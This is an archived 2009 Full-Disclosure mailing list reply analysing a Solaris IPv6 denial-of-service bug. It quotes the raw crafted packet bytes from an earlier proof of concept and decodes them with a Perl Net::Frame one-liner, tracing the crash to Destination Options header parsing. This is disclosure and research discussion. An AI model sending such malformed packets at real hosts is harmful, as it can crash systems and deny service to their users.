full-disclosure-uk January 2009 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] Solaris IPv6 DoS vulne

Re: [Full-disclosure] Solaris IPv6 DoS vulnerabilities (was: Solaris Devs Are Smoking Pot)

From: GomoR <fd_at_nospam>
Date: Fri Jan 30 2009 - 13:49:16 GMT
To: full-disclosure@lists.grok.org.uk


On Mon, Jan 26, 2009 at 08:23:45AM +0100, Kingcope Kingcope wrote: [..] > unsigned char rawData[] =
> "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
> "\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
> "\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";

[..]

% perl -MNet::Frame::Simple -e 'print Net::Frame::Simple->new(raw => "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0c\x29\xff\xfe\xf1\x1e\xbb",firstLayer => 'IPv6')->print."\n"' Unable to unpack next layer, not yet implemented in layer: 0:IPv6 IPv6: version:6 trafficClass:0x0f flowLabel:0xc5729 nextHeader:0x3c IPv6: payloadLength:0 hopLimit:86 IPv6: src:6f35:4072:702f:5258:cc95:1279:30bb:be25 dst:fe80::20c:29ff:fef1:1ebb

So this vulnerability is due to an implementation flaw in the parsing of IPv6 Destination Header (0x3c). Of course, there is no IPv6 DH to parse :)

This vulnerability only exists when setting next header to 0x3c or does it work with other values ?

My guess is that we have a more general issue here. -- ^ ___ ___ http://www.GomoR.org/ <-+ | / __ |__/ Research Engineer | | \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]--- | +--> Net::Frame <=> http://search.cpan.org/~gomor/ <---+ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/